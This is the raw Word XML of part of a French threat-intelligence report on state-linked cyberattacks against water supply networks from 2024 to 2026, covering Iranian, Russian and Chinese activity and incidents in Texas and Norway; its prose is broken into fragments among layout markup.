                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle04"/>
                            <w:spacing w:val="200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1"/>
                            <w:spacing w:val="4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">16 juin 2026</w:t>
                        </w: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 : Rapport sur les attaques menées par des États contre les réseaux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4304" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1358265</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2013608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4190299" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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9029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d'approvisionnement en eau entre 2024 et 2026 par DomainTools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58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53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2563518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="656568" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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5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Synthèse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63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2838473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Les réseaux d’eau et d’assainissement sont devenus des cibles privilégiées dans la “zone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73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3022623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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grise”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59</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, car ils sont extrêmement vulnérables et revêtent une valeur stratégique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84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3206773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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disproportionnée. La combinaison d’un sous-investissement chronique et d’une sécurité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94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3390923</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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base insuffisante des technologies opérationnelles (OT) rend bon nombre de ces systèmes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04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3575073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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critiques faciles à compromettre. De telles intrusions peuvent avoir des répercussions tant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14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3759223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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physiques que psychologiques, et les perturbations affectent souvent la vie des civils,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24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3943373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3559769" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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597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santé publique et la confiance dans les pouvoirs publics.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35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4478678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Parmi les récentes cyberactivités menées par des APTs visant les réseaux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45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4652033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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d’approvisionnement en eau, on peut citer les attaques liées au Corps des gardiens de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55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4825388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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révolution islamique (CGRI) iranien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60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 contre des automates programmables (PLC) exposés,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65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4998743</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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l’accès de acteurs russes et pro-russes aux environnements municipaux de contrôle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76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5172098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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l’eau, ainsi que le prépositionnement lié à la République populaire de Chine (RPC) dans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86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5345453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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infrastructures critiques américaines, notamment les réseaux d’approvisionnement en eau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96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5518808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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de traitement des eaux usées. Les agences fédérales américaines, notamment la CISA,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06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5692163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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FBI, la NSA et l’EPA, ont averti que de nombreux services publics restaient exposés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17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5865518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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raison d’interfaces homme-machine (IHM) et de PLC connectés à Internet, d’identifiants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27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6038873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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faibles, de comptes partagés, d’équipements obsolètes, d’une surveillance limitée et d’une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37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6212228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5150253" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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502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mauvaise segmentation entre les réseaux informatiques (IT) et opérationnels (OT).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47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6474483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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Les opérations visant les réseaux d’approvisionnement en eau s’inscrivent dans une doctrine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58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6658633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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moderne de guerre hybride qui s’est imposée de plus en plus ces dernières années. La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68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6842783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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Russie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61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, la Chine et l’Iran utilisent tous l’accès cyber avant tout comme un outil d’influence,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78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7026933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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et non comme une arme destructrice. L’accès aux réseaux d’approvisionnement en eau, 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88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7211083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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particulier, peut semer la peur, tester les seuils de réaction, mobiliser les ressources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99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7395233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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d’urgence et constituer un levier en cas de crise. Chaque nation apporte sa touche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09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7579383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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particulière à ses opérations. La Russie a tendance à associer l’accès aux infrastructures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19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7763533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">des manœuvres de pression et de déstabilisation. L’Iran mêle souvent représailles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29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7947683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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symboliques, messages psychologiques et perturbations opportunistes. À l’inverse, la Chine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8131833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5719963" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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99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met davantage l’accent sur le prépositionnement à long terme et la persistance stratégique.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50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9035437</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5353976" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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397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58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https://dti.domaintools.com/research/threat-intelligence-report-nation-state-targeting-of-water-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60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9181487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1150698" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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069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systems-2024-2026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70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9327537</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2678721" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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872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59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https://www.gao.gov/products/gao-24-106744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80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2495333" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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5333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60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https://www.ic3.gov/CSA/2026/260407.pdf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91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2495333" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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5333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61</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-3"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://www.ic3.gov/CSA/2024/240501.pdf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014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2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116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2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2192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2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3216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2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4240" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3717925</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="163119" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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1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99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71526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3817617</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="1586229"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="525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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-79" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="1586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1586229">
                          <a:moveTo>
                            <a:pt x="0" y="1586229"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="1586229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158622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628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7139937</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="1523377"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5260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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-40" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="15233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1523377">
                          <a:moveTo>
                            <a:pt x="0" y="1523377"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="1523377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1523377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731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2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833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2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93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52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Ces trois modèles convergent vers la même thèse sous-jacente : cibler les services publics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038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2247287" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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72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civils offre des options stratégiques.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14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1966620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5842590" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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2590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20"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1.</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle42"/>
                            <w:spacing w:val="193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2"/>
                            <w:spacing w:val="-15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Les</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle42"/>
                            <w:spacing w:val="106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2"/>
                            <w:spacing w:val="9"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> réseaux</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle42"/>
                            <w:spacing w:val="10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2"/>
                            <w:spacing w:val="3"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> d’approvisionnement</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle42"/>
                            <w:spacing w:val="105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42"/>
                            <w:spacing w:val="40"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> en eau comme terrain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24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2172360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2042956" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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2956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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">d’affrontement pré-conflit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34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2484778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">De 2024 à 2026, les attaques visant le secteur de l’eau sont passées du simple acte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44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2658133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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nuisance opportuniste à un élément caractéristique de la rivalité entre États. Les réseaux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550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2831488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">d’approvisionnement en eau constituent désormais des points de pression utilisés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652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3004843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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semer la peur, tester la résilience et préparer des options en vue d’un conflit à plus grande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755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3178198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">échelle. Plus précisément, les acteurs malveillants ont exploité des automates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857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3351553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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programmables (PLC) exposés sur Internet et des identifiants peu sécurisés pour altérer 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96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3524908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5219964" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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1996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interfaces homme-machine (IHM) et faire de leurs intrusions des spectacles publics.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0624" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2613025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5400060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2372977" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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297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92"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Figure 29 – Méthodes utilisées par les acteurs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16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5634378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">L’Iran utilise la compromission réussie des réseaux d’approvisionnement en eau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26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5807733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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envoyer des signaux visibles, alimenter des récits de représailles et faire de la propagande,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36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5981088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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tandis que la Russie s’en sert pour semer le chaos, intimider et exercer une pression hybride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47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6154443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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contre les États alignés sur l’OTAN. De son côté, la Chine se concentre sur une persistance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574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6327798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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discrète, la reconnaissance et l’accès d’urgence au sein des infrastructures critiques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67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6501153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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américaines. Cependant, toutes ces opérations visent le même objectif : préparer le terrain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77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6674508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3388357" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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883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pour la guerre sans franchir le seuil d’un conflit ouvert.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8816" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1503680</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8659515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4590986" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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90986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92"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Figure 30 – Chronologie des attaques d’états sur les réseaux d’approvisionnement en eau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98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9028455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5842590" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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2590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12"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2. Russie : un hacktiviste pro-russe et une perturbation du réseau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08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9234195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4326645" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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26645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42"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">d’approvisionnement en eau liée au groupe Sandworm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1888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2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2912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2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3936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2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4960" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3686175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="226669" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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66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100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5984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2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6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747008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8545204</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="334010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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60719" cy="3340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60719" h="334010">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="334010"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3340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7E6E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0080" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>899794</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9435474</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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63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8800" h="6350">
                          <a:moveTo>
                            <a:pt x="0" y="6350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1828800" y="6350"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1828800" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="63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127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1104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7584437</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="701039"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="529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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-88" b="-1"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="701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701039">
                          <a:moveTo>
                            <a:pt x="0" y="701039"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="701039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70103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2128" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>900430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2119627</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="3204210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="529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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-19" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="32042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9449" h="3204210">
                          <a:moveTo>
                            <a:pt x="0" y="3204210"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="3204210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="320421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3152" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5673724</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>406290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1023526" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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526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5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4176" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5939790</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>639335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="758183" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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8183" cy="2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28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520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960778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Des acteurs proches de la Russie ont montré leur volonté d’utiliser leurs accès pour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622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1134133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">manipuler directement les systèmes de contrôle de l’eau. À Mulshoe, au Texas, en janvier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724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1307488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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2024</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle13"/>
                            <w:spacing w:val="-1"/>
                            <w:sz w:val="19"/>
                            <w:szCs w:val="19"/>
                            <w:vertAlign w:val="superscript"/>
                          </w:rPr>
                          <w:t xml:space="preserve">62</w:t>
                        </w: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, des attaquants ont accédé à une interface industrielle à distance et ont provoqué le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827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1480843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">débordement d’un réservoir d’eau municipal pendant environ 30 à 45 minutes. Le groupe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929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1654198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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“Cyber Army of Russia Reborn” a revendiqué cette attaque, et Mandiant a établi un lien entre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032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1827553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4614923" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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149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ce groupe et Sandworm, l’unité cyberdestructrice russe associée au GRU.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1344" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1723389</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5320050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4151960" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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5196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92"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Figure 31 – Etat de la menace russe sur les réseaux d’approvisionnement en eau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236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5554368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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Un peu plus d’un an plus tard, en avril 2025, des attaquants ont pris le contrôle d’un barrage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339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5727723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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à Bremanger, en Norvège. Ils ont ouvert une vanne, libérant environ 500 litres d’eau par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441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5901078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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seconde pendant quatre heures avant que l’incident ne soit maîtrisé. Le chef des services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544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6074433</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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contre-espionnage norvégiens a publiquement accusé des acteurs liés à la Russie d’être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6464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6247788</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1657474" cy="160641"/>
